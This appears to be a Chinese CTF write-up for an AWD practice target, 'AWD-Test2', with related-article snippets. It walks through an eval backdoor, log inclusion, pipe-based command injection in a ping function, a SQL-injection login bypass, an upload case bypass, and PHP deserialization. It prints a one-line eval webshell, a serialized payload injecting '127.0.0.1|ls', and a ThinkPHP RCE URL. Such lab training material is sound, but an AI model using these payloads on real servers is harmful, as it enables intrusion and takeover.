AWD-Test2

2023-12-05 14:58
文章标签 awd test2

本文主要是介绍AWD-Test2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

00x1-eval后门

先用D盾扫一波
在这里插入图片描述
在这里插入图片描述

00x2-日志包含

原理:
`log1.php``会把我们的请求以及其他的一些信息写进根目录下的log.php中。
然后我们进入log.php时,就会解析我们的shell了。
也就是有POST或者GET传参的地方,就能getshell
在这里插入图片描述

在这里插入图片描述
在任意位置添加一句话马,然后在/log.php,getshell
在这里插入图片描述
或者…
在这里插入图片描述

00x3-ping

在user.php中的ping,可以用管道来getflag
在这里插入图片描述
在这里插入图片描述
漏洞引发顺序:
index.php中的$c值在function.php中代表了文件名
在这里插入图片描述
function.php
在这里插入图片描述
然后index.php中的run_a($obj,$a);在function.php运行了在$obj中的方法,$a代表方法名
最后由user类中的ping方法引起了漏洞
在这里插入图片描述

00x4-万能密码

在登录页面万能密码
在这里插入图片描述
sql语句为(在user.login中)
在这里插入图片描述

00x5-文件上传

没有过滤大小写,可以传一个含一句话马的shell,例如a.phP
在这里插入图片描述

00x6-反序列化

第一处:cacf.php可以直接把马写入log.php

<?php
class chybeta{var $test;
}
$class4 = new chybeta();
$class4->test = '<?php @eval($_POST[1]);?>';
$class4_ser = serialize($class4);
echo $class4_ser;
?>

第二处home.php
原理:method是方法,args是参数
在这里插入图片描述

<?phpclass home{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}   
}
$a=new home("ping",array("127.0.0.1|ls"));
echo base64_encode(serialize($a));
?>

这篇关于AWD-Test2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/458027

相关文章

深度学习-神经网络:AWD-LSTM

语言模型可以说是NLP中最基本的任务,无论是词向量,预训练模型,文本生成等任务中都带有语言模型的影子。 语言模型本质上是对一个自然世界中存在的句子建模,描述一个句子发生的概率,因此语言模型也是一个自回归的任务。 语言模型是一个上下文强依赖的任务,不仅需要捕获长距离的信息,还需要学到词之间的位置关系,从目前的技术来看,RNN系的模型在语言模型任务上的表现要优于transformer,主要原因还是

NLP-预训练模型-2017:ULMFiT(Universal LM Fine-tuning for Text Classification)【使用AWD-LSTM;模型没有创新;使用多个训练小技巧】

迁移学习在计算机视觉有很大的影响,但现在的NLP中的方法仍然需要特定任务的修改和 从头开始的训练。我们提出通用语言模型微调,一种可以应用NLP任何任务中的迁移学习方法。我们模型在分类任务中都表现得良好,并且在小数据集上的表现优异。 一、ULMFiT (Universal Language Model Fine- tuning)组成步骤: a) General-domain LM pretr

AWD攻防比赛流程手册

AWD简单介绍: AWD:Attack With Defence,即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层、系统层、中间件层等),利用漏洞攻击其他队伍可以进行得分,加固时间段可自行发现漏洞对服务器进行加固,避免被其他队伍攻击失分。 一、防御加固 1、Linux基本命令 1、文件备份---------------

Sublime test2 插件

安装Package Control 方法一:在线安装,首先打开 Ctrl + ~,输入如下的代码: import urllib2,os; pf=’Package Control.sublime-package’; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else

Oracle 序列使用时:ORA-08002: 序列 SEQ_WGB_TEST2.CURRVAL 尚未在此会话中定义

一、场景:Oracle中id经常使用序列自增,这就会导致新增时id的使用(A表的主键ID,新增时,同时要在B表中存入一个相同的当前ID) 二、使用:CURRVAL(当前值) NEXTVAL(下一个值): NEXTVAL可以单独使用在sql语句中;而CURRVAL在没有使用NEXTVAL的时候使用的话就会报错(尚未在此会话中定义)。 三、解决:在执行CURRVAL之前需要先执行NEXTVAL

BUUCTF AWD-Test1

打开靶场是这个有些简陋的界面。 随便点点,找到这个东西。 看到ThinkPHP,思路瞬间清晰,老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc。 /index.php/?s=Index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1 成功打开phpinfo界面。

Test2.数据库批处理添加练习(mysql_java)

package JDBC.WildCat.com;import java.sql.*;public class TestBatch {/*** 批处理添加练习* @param args*/public static void main(String[] args)throws Exception {// step1. new一个DriverClass.forName("com.mysql.jdb

2024.2.4 awd总结

学习一下awd的靶机信息 防御阶段 感觉打了几次awd,前面阶段还算比较熟练 1.ssh连接 靶机登录 修改密码 [root@8 ~]# passwdChanging password for user root.New password: Retype new password:  2.xftp连接 备份网站源码 xftp可以直接拖过来  我觉得这步还是非常重要

p81 红蓝对抗-AWD 监控不死马垃圾包资源库

数据来源 注意:一下写的东西是在p80 红蓝对抗-AWD 模式&准备&攻防&监控&批量这篇文章的基础上进行的 演示案例: 防守-流量监控-实时获取访问数据包流量 攻击-权限维持-不死脚本后门生成及查杀 其他-恶意操作-搅屎棍发包回首掏共权限 准备-漏洞资源-漏洞资料库及脚本工具库 前提:开启awd项目,并在真实机使用Xshll 7连接虚拟机与 awd靶机的终端,上一篇文章有详

ciscn 华中赛区分区赛 awd pwn1

罕见的有保护没有都开。 输入是input sb是第一个: :后面的第一个事sc sc后面第一个回车是sd sd后面第一个又是input E0存放着input E8放着sc 所以其实也就是回车为分界,一组一个回车。 :又将每一组分开,分别存放在E0,E8。 有个strcasecmp函数 头文件:#include <string.h> 定义函数:int strcasecmp (const